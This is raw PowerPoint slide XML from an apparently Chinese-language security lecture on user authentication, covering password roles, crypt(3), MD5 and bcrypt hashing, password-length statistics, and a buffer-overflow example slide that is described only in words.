                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B752383B-9DF7-4DD6-9427-10B11F6020DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>对入侵者的第一道防线</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>几乎所有的多用户系统都要求用户不仅提供名称或标识符（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>），还提供密码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>密码用于验证登录到系统的个人的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>通过以下方式提供安全性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>确定用户是否有权访问系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>确定给予用户的特权</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>用于自主访问控制</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>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826A8216-7F27-4A6E-AA68-392ED5CC03D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116013" y="454025"/>
            <a:ext cx="8839200" cy="1282700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击策略和对策</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7599CA7F-F162-4F24-AAD6-71A688FC62F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="381000" y="1828800"/>
          <a:ext cx="8534399"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BB020004-38B9-42F7-A486-46979FA337DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击策略和对策</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack strategies and countermeasures</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{133DDFD1-7688-46CC-AA47-31DDB6D7C309}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228600" y="1828800"/>
          <a:ext cx="8686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图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFEE1864-519D-4DD9-B4D8-18D52BB864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650" y="620713"/>
            <a:ext cx="7488238" cy="623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1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{449016DA-3F8E-47B5-BDCE-1551001840FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1042988" y="546100"/>
            <a:ext cx="9144000" cy="1282700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>实现</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="zh-CN">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82947" name="Rectangle 1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96A57DD6-06DB-489E-B490-06029AD6EE5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="779463" y="1828800"/>
            <a:ext cx="7583487" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Crypt(3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>旨在阻止猜测攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>现在认为这种具体的实施是不够的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>尽管其已知的弱点，但是与现有的帐户管理软件或多供应商环境兼容，这种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>方案通常仍然是必需的</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>MD5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>安全哈希算法</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>许多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>系统（包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux，Solaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FreeBSD）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>的推荐哈希函数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>比</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>crypt(3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>慢得多</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Bcrypt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>开发用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>OpenBSD</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>可能是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>散列</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>盐方案最安全的版本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>使用基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Blowfish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>对称块密码的哈希函数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>执行缓慢</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>包含一个成本变量</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="1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2F834157-5D09-4970-AB17-BA8334D4A72F}"/>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0C7AC16F-0E43-48EF-9F6C-3D57B38F16D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460375" y="2055813"/>
            <a:ext cx="8486775" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>漏洞利用示例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>精心构造溢出区数据，成功修改返回地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>思考：会发生什么？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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E1F7EBE-EBBC-43E0-8EA3-9424672D3EDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116013" y="5459413"/>
            <a:ext cx="6724650" cy="1398587"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Table 11.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>观测到的口令长度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> [SPAF92a]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="242691" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{087B7F77-F9A6-4745-A780-A3BFA7D3D826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="15094" r="16605" b="6729"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1065213" y="1978025"/>
            <a:ext cx="6826250" cy="4181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1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9EEB53F-C64D-4BB9-A537-6D01E42992A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116013" y="981075"/>
            <a:ext cx="9144000" cy="1282700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>用户口令选择</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">
    <p:wip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DC5E24-0C1C-41F1-B0F3-757AB893EF0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6142038" y="1993900"/>
            <a:ext cx="2755900" cy="2862263"/>
